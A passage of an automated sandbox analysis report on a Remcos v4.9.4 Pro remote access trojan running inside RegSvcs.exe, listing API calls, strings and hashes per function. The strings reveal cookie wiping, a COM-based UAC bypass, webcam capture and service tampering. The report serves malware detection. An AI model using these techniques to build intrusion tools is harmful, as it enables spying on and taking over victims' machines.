                              • Opcode Fuzzy Hash: ffdf125771be3930cd34b67c2c4896bc65d4a075ba9d32331fcf35df296b8716
                              • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                              APIs
                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Enum$InfoQueryValue
                              • String ID: [regsplt]$xUG$TG
                              • API String ID: 3554306468-1165877943
                              • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                              • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                              • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                              • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                              APIs
                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                              • __fassign.LIBCMT ref: 0044B479
                              • __fassign.LIBCMT ref: 0044B494
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                              • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                              • String ID:
                              • API String ID: 1324828854-0
                              • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                              • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                              • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                              • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                              APIs
                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEnumInfoOpenQuerysend
                              • String ID: xUG$NG$NG$TG
                              • API String ID: 3114080316-2811732169
                              • Opcode ID: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                              • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                              • Opcode Fuzzy Hash: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                              • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                              APIs
                                • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                              • _wcslen.LIBCMT ref: 0041B763
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                              • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                              • API String ID: 37874593-122982132
                              • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                              • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                              • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                              • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                              APIs
                                • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                              • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                              • API String ID: 1133728706-4073444585
                              • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                              • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                              • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                              • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                              • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                              • Opcode Fuzzy Hash: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                              • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                              APIs
                                • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                              • _free.LIBCMT ref: 00450F48
                                • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                              • _free.LIBCMT ref: 00450F53
                              • _free.LIBCMT ref: 00450F5E
                              • _free.LIBCMT ref: 00450FB2
                              • _free.LIBCMT ref: 00450FBD
                              • _free.LIBCMT ref: 00450FC8
                              • _free.LIBCMT ref: 00450FD3
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                              • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                              • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                              • int.LIBCPMT ref: 00411183
                                • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                              • std::_Facet_Register.LIBCPMT ref: 004111C3
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                              • String ID: (mG
                              • API String ID: 2536120697-4059303827
                              • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                              • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                              • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                              • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                              APIs
                              • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                              • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastValue___vcrt_
                              • String ID:
                              • API String ID: 3852720340-0
                              • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                              • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                              • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                              • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                              APIs
                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 004075D0
                                • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                              • CoUninitialize.OLE32 ref: 00407629
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: InitializeObjectUninitialize_wcslen
                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                              • API String ID: 3851391207-3294358829
                              • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                              • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                              • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                              • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                              • GetLastError.KERNEL32 ref: 0040BAE7
                              Strings
                              • UserProfile, xrefs: 0040BAAD
                              • [Chrome Cookies not found], xrefs: 0040BB01
                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                              • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              • API String ID: 2018770650-304995407
                              • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                              • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                              • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                              • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                              APIs
                              • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                              • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Console$AllocOutputShowWindow
                              • String ID: Remcos v$4.9.4 Pro$CONOUT$
                              • API String ID: 2425139147-3065609815
                              • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                              • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                              • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                              • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                              APIs
                              • __allrem.LIBCMT ref: 0043AC69
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                              • __allrem.LIBCMT ref: 0043AC9C
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                              • __allrem.LIBCMT ref: 0043ACD1
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                              • String ID:
                              • API String ID: 1992179935-0
                              • Opcode ID: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                              • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                              • Opcode Fuzzy Hash: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                              • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                              APIs
                              • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: H_prologSleep
                              • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                              • API String ID: 3469354165-3054508432
                              • Opcode ID: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
                              • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                              • Opcode Fuzzy Hash: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
                              • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                              APIs
                                • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                              • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                              • String ID:
                              • API String ID: 3950776272-0
                              • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                              • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                              • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                              • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: __cftoe
                              • String ID:
                              • API String ID: 4189289331-0
                              • Opcode ID: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                              • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                              • Opcode Fuzzy Hash: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                              • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                              • String ID:
                              • API String ID: 493672254-0
                              • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                              • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                              • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                              • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                              APIs
                              • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • _free.LIBCMT ref: 0044824C
                              • _free.LIBCMT ref: 00448274
                              • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                              • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • _abort.LIBCMT ref: 00448293
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free$_abort
                              • String ID:
                              • API String ID: 3160817290-0
                              • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                              • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                              • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                              • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                              • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                              • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                              • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                              • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                              • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                              • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                              APIs
                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Service$CloseHandle$Open$ControlManager
                              • String ID:
                              • API String ID: 221034970-0
                              • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                              • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                              • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                              • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                              APIs
                              • RegisterClassExA.USER32(00000030), ref: 0041D55B
                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
